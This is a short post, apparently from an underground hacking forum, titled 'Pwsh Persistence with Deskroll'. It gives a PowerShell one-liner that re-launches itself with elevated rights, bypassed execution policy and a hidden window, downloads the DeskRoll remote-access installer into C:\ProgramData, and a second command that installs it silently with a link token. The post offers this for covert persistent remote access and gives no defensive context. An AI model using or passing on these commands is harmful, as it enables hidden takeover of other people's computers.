What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Pwsh Persistence with Deskroll

DimmuBurgor

Heavy Weight
Депозит
$0
Код:
Скопировать в буфер обмена
$downloadUrl = "https://deskroll.com/download/win/gtc/DeskRollSetup.exe"; $savePath = "C:\ProgramData\DeskRollSetup.exe"; $wc = New-Object System.Net.WebClient; try { Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs -WindowStyle Hidden; $wc.DownloadFile($downloadUrl, $savePath); Write-Host "File downloaded successfully." } catch { Write-Host "An error occurred while downloading the file: $_" } finally { $wc.Dispose() }
Код:
Скопировать в буфер обмена
cd c:\programdata; ./DeskRollSetup.exe /S --link_token=yourlinktokenhere
 
Top